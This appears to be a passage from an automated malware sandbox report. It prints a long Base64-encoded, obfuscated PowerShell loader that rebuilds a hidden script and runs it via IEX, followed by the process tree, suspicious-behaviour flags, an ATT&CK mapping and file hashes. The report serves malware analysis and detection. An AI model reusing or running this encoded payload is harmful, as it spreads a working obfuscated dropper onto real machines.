ABhAGkAQQBuAGkAbQBhAG4ARwBzAHQAZwBpAHQASABvAG4AbgByACAAcgBlAGEAZwBpAFMATgB1AG0AaQBuAGMARQBrAHMAdAByAHIAZQBuAHMAaAByAG8ASQBtAG0AbwByAGwAZQBsAGEAdABlAGwAUABvAGwAeQBjAEMARwByAGUAYQB0AG8AdQBkAG0AYQBhAG4AUABhAGEAawByAHMAZwBlAG4AZQByAG8AVQBuAGQAZQByAGwAUABsAHUAbQBhAGUAUwBjAGgAcgBlAFMATwB2AGkAbABsAGMAQgByAHUAZwBlAHIAQQBjAG8AbQBhAGUARwBlAGwAYQB0AGUATgBvAHIAdABoAG4AUwB2AGwAZwBlAEIATABpAG4AagBlAHUAQwByAG8AcwBzAGYAVwB5AHQAZQBkAGYAQgB5AGYAbwByAGUAQgBpAHQAbQBuAHIASQBuAHQAZQByACgASwBoAGkAcwAgAGkAdAByAGEAbgBzAG4ARAByAGEAawBvAHQAQwBpAHIAYwB1ACAARgByAGUAZABzAFUATwB2AGUAcgBiAGoAUwBpAG0AcABsAHYAUAByAG8AagBlAG4ASABlAHIAbwAgAGgAUAB1AGwAaQBzACwAUwBlAGUAYQBiAGkATQB1AG0AaQBlAG4AVgBvAGwAaQBlAHQAUgB1AG0AbQBsACAASwBvAG4AZgB1AFQAUwBrAGEAbABkAHIATQBpAGMAcgBvAHkAVAByAGkAdQBuAGsAUwBuAGkAdAB0AGsATQBlAHMAYQBsACwARwBlAG0AbQBlAGkAQQB1AHMAcABpAG4AVABpAGwAcwBrAHQATwB3AHMAZQAgACAAVQBuAGMAbwBuAEMAUAByAG8AZAB1AG8AVAByAHUAcwB0AGgARwBlAG4AZQByAGEAQgBlAHIAZwBnAGIAQgByAGUAZABuAGkAUwBhAGwAdABtACwASwBlAGwAbABpAGkATQBpAGQAZABsAG4AQgBlAHQAcwAgAHQAUgBvAG4AdABnACAAUgBlAGcAaQBvAEEAQQBiAGQAaQBjAG4AVQBuAG0AeQBzAHMAcwBsAGEAZwBpAGEARgBsAGoAZQB0AGUATQBpAHMAcwB1ACwAbAByAHIAZQBkAGkASwBvAGcAZQBrAG4AUABoAGEAZQBvAHQAcgByAGUAZABzACAAUwBsAGEAbQBiAFMAYQBmAHYAbgBuAHAAVgBlAGoAdgBzAGwAVQBuAGUAYwBsAGUAUwBvAGYAdABoACkAUgBlAGQAdQBjADsACgBDAGEAbQBlAHIAWwBTAGEAbQBmAHUARABVAG4AYQBsAGwAbABIAGEAbAB0AGUAbABQAGEAcwB0AGEASQBQAG8AbAB5AG0AbQBWAGcAdABrAGwAcABTAGsAbwB2AGwAbwB0AGEAbgBkAGgAcgBPAHIAZABrAGwAdABTAGwAdQB0AHQAKABrAHIAdQBkAHQAIgBKAGEAYgBvAHIAZwBQAGEAYQBuAHIAZABNAGEAdQBnAGkAaQBQAGEAcgBjAGUAMwBQAGUAbgBhAGwAMgBoAG8AcgBzAGUAIgBTAGUAYwBhAHQAKQBTAGEAbAB1AHQAXQBFAGwAaQB0AGUAcABNAG8AbgBvAHAAdQBiAGwAYQBjAGsAYgBTAGsAbwBuAG4AbABTAGUAbAB2AG8AaQBWAHIAZABpAGYAYwBIAHkAcABwAGUAIABSAGIAZABpAGcAcwBTAGsAcgBtAGIAdABvAG4AZABzAGsAYQBHAHUAdABzAGkAdABIAHkAcABzAGkAaQBUAGgAeQBtAG8AYwBTAHUAZQBuAHQAIABQAHIAagB1AGQAZQBOAG8AbgB2AGkAeABSAGUAYwB0AGEAdABDAG8AeABwAG8AZQBFAGYAdABlAHIAcgBlAHUAcAB5AHIAbgBEAHIAYQBjAGgAIABDAGgAYQByAHAAaQBQAGkAbgBuAGEAbgBGAHMAdABuAGUAdABVAG0AYQBhAGQAIABTAHQAYQB0AHUAQwBIAGEAbABzAGwAcgBVAG4AYwBvAGwAZQBlAG4AaAB5AHAAYQBjAGEAZgB0AGUAdABTAHQAZQB0AHMAZQBTAHQAZQBlAGwASQBqAG8AbQBmAHIAQwBTAGwAYQBnAGwAKABDAG8AZQBsAGEAaQBlAHgAYQBtAGkAbgBCAHIAaQBzAGEAdABBAG4AZwBpAHYAIABOAHkAYQBuAHMAQgBVAG4AZABpAHYAcgBOAGEAcgBhAG4AaQBTAGwAdAB0AGUAZABNAGkAbgBpAGsAZwBGAGQAZQBzAHQALABCAGoAZgBmAGUAaQBXAGkAZQByAGEAbgBRAHUAbwAgAFYAdABKAGUAYgBsAGkAIABGAGwAYQBzAGsARABjAGEAcgByAGkAcgBJAG4AdAByAG8AdQBPAGYAZgBlAG4AbgBGAGUAbQBrAG0AawBQAGgAZQBuAG8AZQBOAGEAdABpAG8ALABLAGUAcgBuAGUAaQBHAGkAYQBuAHQAbgBEAGEAZwBzAHAAdABMAGEAZwBlAG4AIABEAGEAdABlAHIARwBVAGUAZwBuAGUAcgBTAHkAbgBhAHIAdQBzAGUAbgB0AGkALABUAHIAawBwAGwAaQBLAHIAdQBkAHQAbgBQAHMAZQB1AGQAdABBAHAAYQByAHQAIABEAHkAcwB0AHIATABVAGQAZwBpAGYAeQBCAGUAbQB1AHoAbgBNAGkAbQBvAHMAZgBpAG4AdABlAHIAcgBPAHMAdABlAG8AKQBIAGUAbQBpAGMAOwAKAGUAZgB0AGUAcgBbAEwAYQBuAGQAdgBEAE4AZQBkAGsAbQBsAEIAYQBkAGUAbABsAEQAaQBzAHAAbABJAHMAbgB1AGQAZQBtAEYAbABpAHMAZQBwAFIAZQB2AGkAcwBvAFAAZQByAGEAYwByAEMAcgBlAGUAcAB0AEQAYQBnAHQAagAoAEcAbwBnAG8AcAAiAFUAZABzAHQAcgBrAEYAcgBlAG0AYgBlAG4AeQBzAGcAZQByAE4AaQBsAGcAYQBuAEIAYQBuAGEAbgBlAE4AbwBuAGQAZQBsAFAAaQByAG4AeQAzAFQAZQBsAGUAawAyAFIAaABlAHUAbQAiAFYAYQBnAG4AZQApAFQAaAByAGUAYQBdAE0AaQBkAGQAYQBwAFUAbgBkAGUAcgB1AEUAcwBzAGkAbgBiAE4AbwBuAHQAcgBsAFMAZQBtAGkAcwBpAEUAdAB5AG0AbwBjAEUAZwBlAHQAcgAgAEgAZQBsAGkAawBzAFQAaQBsAGwAYQB0AFAAdQBsAHMAbwBhAEEAZgBsAGUAZAB0AEIAbABnAGUAbABpAFAAcgBvAGcAcgBjAFUAdAByAHkAZwAgAFMAZQBrAHYAZQBlAFAAdQBsAHYAZQB4AEsAbABhAHAAcwB0AEkAcwBvAGwAYQBlAEcAYQBzAHQAcgByAFQAcgBpAG8AbABuAFYAdQBsAGcAYQAgAEgAbwB2AGUAZABpAFMAeQBuAGwAaQBuAEQAaQBzAGMAbwB0AFMAZQBnAG8AcwAgAEQAdQBjAGsAaQBHAFAAZQB0AGUAcgBlAHUAbgBkAGkAZgB0AEEAYwBlAHQAeQBDAEEAbQB1AHMAaQB1AHYAaQB2AGQAYQByAEUAbgB2AHkAIAByAFUAbgBnAHIAZQBlAEkAbABsAHUAcwBuAEUAawB2AGkAcAB0AE0AYQByAGsAZQBQAGIAbwBtAG0AZQByAEMAYQByAHIAaQBvAEEAYwBjAHIAZQBjAE4AZQBkAHQAcgBlAEIAZQBwAG8AdwBzAEEAbgB0AGkAYgBzAEYAbABlAG0AbQAoAFIAZQBlAGwAZQApAEgAZQBuAHMAeQA7AAoAQgB1AHMAaABlAFsATgB5AHMAawBhAEQASwByAGUAZABpAGwAQwBlAG4AdABlAGwARAB2AHIAZwBrAEkASQBuAHYAZQBuAG0AQwBvAGQAbwAgAHAATgBlAGQAaQBzAG8AVQBuAGMAaABlAHIAcAByAG8AcABvAHQARQBrAHMAcABvACgAawBhAHAAaQB0ACIAQQBhAHIAcwBvAGsAVABpAHQAdAB1AGUAUwB0AHUAbQBwAHIATABuAHIAYQBtAG4ATABpAGwAbABlAGUAQwByAGEAcABwAGwAVAB1AHIAYgBlADMAQQBwAGEAdABpADIAcwB0AGUAbABsACIARgByAGkAdABpACkAQgBpAHMAdABvAF0AQQB1AHQAZQBuAHAARABpAHMAYQBjAHUARQB4AHQAYQBuAGIAVQBuAG0AaQBuAGwATQB5AHMAdABlAGkAUwB0AGkAcABlAGMARwBlAG4AYQB2ACAATgBhAHIAYwBvAHMAUwB1AHAAZQByAHQATABlAGcAZQBwAGEARABtAHAAZQB0AHQARgBhAGwAYwBrAGkAQgBhAGcAZQBvAGMAUgBvAGMAaABlACAATQBpAHMAdgBpAGUATABpAG0AZQBkAHgAVAB1AG4AbgBlAHQAUwBwAG8AcgB0AGUASQBtAG0AaQB4AHIARgByAGUAbQBkAG4AUwBjAGgAbwBvACAAaABhAG0AbwB1AGkATQBpAHMAYwBvAG4AUwBuAG8AaABhAHQAYgBlAHQAaABlACAATQBvAHQAbwByAEcASQBuAGQAbABlAGUARQBuAGUAYQBuAHQARABlAGsAbwBtAFQATgBhAHYAbgBlAGUARgByAGUAbQB0AG0AVgBlAG4AaQAgAHAAUwB0AHIAYQB0AEYAUAB5AHQAdABlAGkASABhAHIAcAB1AGwASQBsAGwAaAB1AGUAUwBrAGEAbQBmAE4ATQBlAGQAaQBlAGEAUwBrAGkAZgB0AG0AVwBvAG8AbABzAGUAbABvAGMAdQBzACgARgBvAG8AegBsAGkAUABlAGEAcgBsAG4AUwBwAHIAbwBnAHQARgByAGkAZwByACAATQB1AHIAcgBlAEIARQBnAGUAbgBtAHUAVAByAGEAawB0AGQAQwBvAG0AZABlAGUASQBuAHQAZQByAG4ARAByAHUAbQBiAGUAVAByAGEAbgBzACwATQB1AGwAYwBoAGkASABvAHUAcwBlAG4AUwB0AGEAdgByAHQAUwBsAGEAZwBvACAAQgBhAHQAaABvAEgAQQByAGkAdABoAG8ARgBhAGQAcwBlAHYAYgBlAGEAcwB0AGUAUwBlAGEAcwAgAGQAYQBuAGkAbQBhADIAUABlAGEAYwBlADAAWgBvAGwAbwBzADMASwByAGkAYwBrACwAUwBvAGwAbwBpAGkAQwBvAHIAYQBuAG4ARwBhAHYAbAB0AHQAUABoAG8AbgBvACAAQwBvAGEAYgBvAFIAQQBsAGwAbwB0AG8AWgBpAG8AbgBpAHMAVAB1AGQAZQBoAGkAQgBlAGgAYQB2AG4ARwB1AG4AagBhAGQAUAByAGUAdABlADkAQgBhAHIAawBlACwAYwBvAG4AdABjAGkASAB5AHAAZQByAG4ASwBuAG8AZwBsAHQAQwB5AHQAbwB0ACAATQB5AGkAYQByAFQARQB0AGgAbAB5AHUATgByAGYAbwByAGwAQQBtAGUAbAB1AGwAQwBoAGEAbgBnAGUAQwBlAGMAaQBsACkAQQBzAGMAbwBnADsACgBTAHQAaQBsAG4AfQAKAEcAYQByAHIAbwAiAEQAaQBwAGwAbwBAAAoAUwB1AHAAcgBlACQARgBsAHUAYwB0AFYAUwBrAGIAbgBlAGkAVQBuAGIAYQBwAHIAVAByAGsAbgBpAGsARABhAGwAZQByAGUAUgBlAHMAdABhAGwAcABlAHIAcwBvADMAbgB5AHMAZwBlAD0ARwBhAGwAbgBpAFsAQgBvAG0AYgBlAFYAVAB1AG4AZwBtAGkAVwBpAGsAZQBuAHIAUwBoAGUAcABoAGsAQgByAGkAYQByAGUAVgBpAHQAcgBpAGwAUwB3ACAASwByADEATQBvAHQAbwBjAF0ATgBhAG4AYwBpADoAUwB1AHAAcAByADoARQBwAG8AawBlAFYAUABhAHAAaQBzAGkAVABpAG0AZQB3AHIARgBsAHkAcABlAHQATABpAHQAZQByAHUAQQB2AGUAZABlAGEARgBvAHIAagBhAGwARQBtAGUAdABpAEEAQgBhAGwAZAB5AGwATQBhAHQAZQByAGwAaABqAGUAbQBtAG8ATABlAGQAaQBnAGMAVgBhAGMAYQB0ACgASABvAHYAZQBkADAAUwBrAG8AdgBzACwARwBhAG0AbQB5ADEAVgBlAG4AaQBzADAAQQBmAGQAYQBtADQAVgBhAHIAbABpADgAUwB0AHkAcgBrADUAQgBlAHIAawBvADcAUwB0AGEAcwBpADYAQgByAGEAZABhACwARABlAHAAZQByADEAQgBvAHIAbgBlADIASwBlAHIAbgBlADIAUwBpAG4AcwBzADgAUABvAHQAbwBtADgAQQBkAHYAYQByACwAQgBsAGEAYQByADYARwB1AGYAIABFADQAUwBjAGgAdwBlACkACgBHAGwAYQBzAGUAJABOAG8AbgBwAGwATgBQAHIAYQBnAHQAYQBPAGMAYwBpAHAAdQBIAGUAaQBnAGgAcwBPAG4AZQBpAHIAZQBOAG8AbgB2AGEAYQBIAGEAbAB2AGQAbgByAGEAbQBtAGUAdABLAGEAcwBzAGUAdQBJAG4AcAB1AGwAPQBHAGwAYQBuAGQAKABaAGEAbgBlACAARwBBAG4AYQBnAGwAZQBIAG8AbQBlAGYAdABTAGYAYQBlAHIALQBDAG8AbgBzAHUASQBUAG8AeABhACAAdABVAGQAcwBrAGkAZQBHAHIAZQBlAGQAbQBTAGsAeQB0AGkAUABDAGEAcgBvAHQAcgBBAGYAcwB2AGEAbwBLAG8AawBsAGEAcABGAGwAbABlAHMAZQBDAG8AZQB0AGEAcgBCAG8AbQB1AGwAdABDAG8AYwBrAGYAeQBSAGEAawBlAHQAIABTAGEAbQBuAGkALQBLAHAAaABlAHMAUABGAHIAZQBtAGUAYQBGAGEAcgBuAGUAdABMAGEAbQBiAGEAaABCAG8AcgBnAGUAIABCAGwAdQBlAHkAIgBCAGUAcgBlAG4ASABDAG8AdQBwAGwASwBTAGsAYQBiAHMAQwBEAHkAcgBzAGsAVQBEAHUAYgBiAGkAOgBOAGUAZABhAGQAXABTAGwAdQB0AHMAUwBTAGUAbQBpAHIAbwBTAHAAcgBqAHQAZgBSAGkAbgBnAGUAdABTAG0AbwB2AHMAdwBVAG4AcAByAG8AYQBNAGUAdABhAHMAcgBTAHQAYQB2AGUAZQBIAGUAcwB0AGUAXABBAGEAbABlAHIAUwBQAHIAYQBlAGMAcABTAGsAaQBsAHMAbgBIAGUAcwBzAGUAZQBCAHIAbwBtAGkAbgBJAG4AdABlAHIAZABDAG8AbgBmAGkAIgBPAG4AYwBlAHMAKQBBAHMAaQBsAG8ALgBUAHIAawBpAHMAVQBoAGEAcgBwAHUAbgBCAGEAdABpAGsAcQBQAGEAcgBhAHQAdQBTAHUAYgBkAHIAZQBBAHQAaAB5AG0AcwBBAG4AbABnAHMAdABCAGEAZwBnAHIAaQAKAEYAbwByAHUAcgAkAFIAdQBkAGUAbABCAEIAdQBrAHMAZQBlAE4AZQB1AHIAbwBzAFUAbgBjAGkAYQBrAEMAbwBtAG0AbwAgAFMAcABpAHMAZQA9AEgAYQByAG0AbwAgAEEAZgBoAG4AZwBbAEcAcgBuAHMAZQBTAEEAcgBrAGEAZQB5AFQAZQBzAHQAZQBzAFAAdQBuAG4AaQB0AGYAbwByAGsAdABlAHIAZQB1AHAAbABtAE8AdABoAGUAcgAuAEMAaABsAG8AcgBDAFAAcgBpAG0AaQBvAEIAbABhAGQAZABuAEgAZQBsAGcAYQB2AEEAawB0AGkAbgBlAEgAZQBsAGYAcgByAFMAZQBtAGkAbwB0AE0AbwB2AGkAZQBdAFMAbABpAGQAcwA6AEIAaQBnAG4AbwA6AEEAbgBhAGwAZQBGAEgAZQBtAGkAcAByAEcAcgBpAG0AYQBvAHQAZQBsAGUAZgBtAEMAeQB0AG8AZABCAFYAYQBpAHIAZQBhAEQAZQBsAGkAdgBzAEsAdQBtAG0AZQBlAE8AcgBpAGUAbgA2AEMAbwBuAHMAaQA0AEgAagBoAGUAZABTAFAAcgBlAHQAcgB0AEYAdQBuAGcAaQByAFAAbABhAG4AdABpAEQAaQBwAGwAYQBuAFMAdQBwAGUAcgBnAHYAZQB4AGkAbAAoAFMAbgBvAHIAawAkAGQAZQBwAGEAcwBOAFMAdABlAHIAZQBhAEIAaQBvAGwAbwB1AFIAZQBhAG0AcwBzAHQAYQBnAHAAYQBlAEYAZQByAHIAZQBhAEUAbQBlAHIAcwBuAFIAaQB2AGEAbAB0AEYAaQBkAGcAZQB1AFMAcABhAGEAcgApAAoAQQBsAHQAZQByAFsAQwBoAGUAYwBrAFMARgBhAHkAaQBuAHkAUABpAG8AbgBlAHMATwBjAHQAYQBuAHQAVgBlAHMAdQB2AGUAVQBuAHMAcABpAG0ATQBpAGQAZABhAC4AVgBnAHQAZQByAFIAUwB0AGEAZwAgAHUAUABhAHUAcABlAG4AVQBuAGQAZQByAHQASQByAGsAcwBvAGkAUAByAG8AZgBhAG0AUgBlAHMAZQByAGUARgBqAGUAcgBuAC4AdABvAHIAbgB0AEkAVQBuAGQAZQByAG4ARgBvAHIAZQBwAHQAVQBuAG0AYQBuAGUAVABhAGIAbABlAHIAVABvAG4AaQBjAG8AUwB1AGQAYQBuAHAAcwB0AGUAbQBtAFMASABhAGkAbgBhAGUAQwBvAHUAbgB0AHIAVQBrAHIAdQBkAHYAZwBlAGIAcgBkAGkAQwBlAHIAYgBlAGMAQgByAHUAZwBlAGUARgBvAHIAdABqAHMARwBhAG8AbABlAC4AUgB1AG0AbQBlAE0AUABhAGwAdABlAGEARABlAGgAbwByAHIASABvAHIAbgBmAHMAbgBvAG4AbQBpAGgARgB1AHQAdQByAGEAUwBwAGwAYQB5AGwAVABvAHIAZABpAF0AUABsAGEAaQBzADoAQwBlAG4AdAByADoAQgBhAGMAaQBsAEMAcwBrAHIAdQBlAG8AVQBtAGIAcgBpAHAAUABlAG4AdABhAHkAVABoAGUAcgBtACgAdQBuAGQAZQByACQARABpAGEAZABvAEIAYgBsAGEAcwB0AGUARwB1AGQAZABvAHMAbABhAGcAcgBpAGsAUABvAHMAdAB0ACwATQBlAGQAaQBjACAAUwBsAHUAdABuADAAQwBlAGwAbABlACwAVQBuAHMAbwBsACAATABpAGwAbABlACAATQBpAGwAagBtACQAQQBwAG8AcwB0AFYAUwBrAGkAbABkAGkARAB1AGIAYgBlAHIAQgByAGkAcwB0AGsAUgBlAGYAbwByAGUAcwB5AG0AcAB0AGwAVQBkAGYAcgBzADMAUwBrAGkAYgBlACwAcABhAHIAaQB0ACAAdAByAGUAbQBwACQAQwBoAGkAYwBxAEIAVQBuAGkAcABsAGUASwBhAHQAYQBsAHMAUgBhAG4AcwBhAGsAVQBuAHIAbwBzAC4AUwBsAGEAbgBrAGMAUgBlAGkAdgBlAG8ARAB5AG4AYQBtAHUATQBlAGwAYQBkAG4AQgBsAGkAbgBkAHQASQBzAHQAaABtACkAUgBlAHAAcgBvADsACgBQAGgAcgBhAHQAWwBCAGUAdABhAHQAVgBBAGEAcgBlAG0AaQBBAG4AZwByAGUAcgBBAHAAbwBwAGwAawBWAGUAYwB0AG8AZQBTAHkAcwB0AG8AbABiAG8AbgB6AGUAMQBTAGUAZQBjAGgAXQBTAGwAYQBnAHQAOgBNAG8AcABlAHIAOgBUAGUAbQBzAGUARQBIAHUAbgBkAHIAbgBTAHQAcgBhAGYAdQBEAGkAYQBtAGEAbQBDAG8AYwBrAGIAUwBHAHIAYQB0AHUAeQBBAGIAdQBuAGUAcwBDAGEAdABlAGMAdABCAHIAbwBkAGUAZQBTAHAAcgBvAGcAbQBiAHIAdQBkAHMATABEAGcAbgBmAGwAbwBkAGUAcAByAGUAYwBmAGEAdgBlAGwAYQBGAG8AcgBiAHIAbABzAGUAcgBlAG4AZQBLAHIAeQBkAHMAcwBNAG8AcgBuAGUAQQBTAHkAcwB0AGUAKABNAGUAdABoAG8AJABVAG4AZgB1AHMAVgBFAGwAZQBjAHQAaQBrAGwAaQBuAGcAcgBTAHQAcgBhAG0AawBOAGkAawBrAGUAZQBPAGIAdgBlAHIAbABSAGUAcAByAG8AMwBBAGIAZABpAGEALABHAGgAbwBzAHQAIABFAGwAZQBjAHQAMABIAGkAbQBtAGUAKQBUAGEAbABvAGYAIwAKACcAQAANAAoADQAKAA0ACgBGAG8AcgAoACQAaQA9ADUAOwAgACQAaQAgAC0AbAB0ACAAJABEAGEAdgB5AGsAbABhAHAAcABlAC4ATABlAG4AZwB0AGgALQAxADsAIAAkAGkAKwA9ACgANQArADEAKQApAA0ACgB7AA0ACgAJAA0ACgAJACQARABpAGUAdABlAHIAcwBzAGEAIAA9ACAAJABEAGkAZQB0AGUAcgBzAHMAYQAgACsAIAAkAEQAYQB2AHkAawBsAGEAcABwAGUALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAaQAsACAAMQApAA0ACgAJAA0ACgAJAGkAZgAgACgAJABEAGEAdgB5AGsAbABhAHAAcABlAC4AUwB1AGIAcwB0AHIAaQBuAGcAKAAkAGkAKwAxACwAIAAxACkAIAAtAGUAcQAgACIAYABuACIAKQAgAHsADQAKAAkACQAkAEQAaQBlAHQAZQByAHMAcwBhACAAPQAgACQARABpAGUAdABlAHIAcwBzAGEAIAArACAAIgBgAG4AIgANAAoACQAJACQAaQAgAD0AIAAkAGkAIAArACAAMQANAAoACQB9ACAACQANAAoACQAJAA0ACgAJAA0ACgB9AA0ACgANAAoADQAKAEkARQBYACAAJABEAGkAZQB0AGUAcgBzAHMAYQANAAoA"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:1732
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\xti-9sgh.cmdline"
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:1164
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESFD83.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCFD72.tmp"
      4⤵
      PID:520

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

1

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\RESFD83.tmp

Filesize
1KB

MD5
65237b683c4559069417742d5cdf7507

SHA1
93163acb0170fbc7f19228bfaa88ad40dace59d6

SHA256
5abec3871dfd550021d7b1f60baab7ef7aa81b1d9c402f1e06d82d7696dbf9c7

SHA512
e009544bbab054a7d28668acd6a009f8823ea8e87ad63a6b2d6b486e00877d544e37a9f3423e5c8979ed3cd4c27fcc2b6518ff91275807010dfd8c7d2dc6f024

Download Submit
C:\Users\Admin\AppData\Local\Temp\xti-9sgh.dll

Filesize
4KB

MD5
ee5b8b073babe59ef9cd64b866b9f1d8

SHA1
21bbf007283adc5c2a7ae1d197215b21d9998758

SHA256
80bc8f9b857811a2a6e23aa9dfba4719103ba98d983bc020ccc6436acca3d0cc

SHA512
3a03ac07eb50e706b7502e60409accb153d2a0b90a8e236f57b5731b605f77cb8bd6918599030373e3daea3596681592c11971628f4ca074273b03adaee736e7

Download Submit
C:\Users\Admin\AppData\Local\Temp\xti-9sgh.pdb

Filesize
7KB

MD5
8d902aeaf279707036c905ae43bffcf1

SHA1
bcffb25cfa4f8bb10c2ea464daf03d7a5e306c64

SHA256
e2662cf64c89bfc482ab14a60676d1a1a56bcbdd689df4ce09fa2c017f16ae30

SHA512
067c5ccdd5bcf7ca463cc9be680e593ca1b0d771f0bcb734301aae713d4e9ca4bf1cf2d13759873a1658a43eb734dc010c980ee77b63b40b1d8cfec03aed8607

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFD72.tmp

Filesize
652B

MD5
0f03d6e62f0ddde066708e6f2b2cf516

SHA1
e03c2a920889a214065214fc1babb51c92d97a0f

SHA256
8078919889f099f2d8f06ac52fc5da71578641d17a0089bdbfb69a3bc9b1a100

SHA512
59a6b39866ad6b8edfbc689ed13fd0d5923e78187e587ba921b152c57fba96a66e994ac1d085425ef3346557a9ee43213c920183dd3934b919b75e0a189c69e5

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xti-9sgh.0.cs

Filesize
1KB

MD5
a32112efa20f4cea810ad1b41d7dd620

SHA1
c931b9918020ecad878104c98248dc9fc41e6e76

SHA256
931aafc6d353424a918670072b0163c0b7fb0fcf75711d4a54dc4892d2c6e428

SHA512
c9b40717eb9c8934f9e1ada66369e5f59fbff9f0735c7db92a5108d8252ec4f48023ae05553d8cf5ff0d8df4c560f784629f9be7015cb423b47a57ca62f2a584

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\xti-9sgh.cmdline

Filesize
309B

MD5
1c7eddd5c82fc109f198d8cc75a61b25

SHA1
e74882e8b36afc41a90356b404dcd379077f0da8

SHA256
af9a2e8b0be3b9b0e4b40efa12f7bb6e4b806fafabb9ca8d55d18b536efc6006

SHA512
85e80f129a75b73bf033531c5eb7f0c8a2e69af22e1b25993c851732c95d2a98c53cf42ea8e096c8af29121030967231646e83acf2ecdb9aaf736ed7fd89d7be

Download Submit
memory/1700-54-0x000007FEFC611000-0x000007FEFC613000-memory.dmp

Filesize
8KB

Download
memory/1732-57-0x0000000074660000-0x0000000074C0B000-memory.dmp

Filesize
5.7MB

Download
memory/1732-56-0x0000000076BA1000-0x0000000076BA3000-memory.dmp

Filesize
8KB

Download
memory/1732-66-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download
memory/1732-67-0x0000000074660000-0x0000000074C0B000-memory.dmp

Filesize
5.7MB

Download
memory/1732-68-0x0000000005040000-0x0000000005140000-memory.dmp

Filesize
1024KB

Download

Analysis

Sharing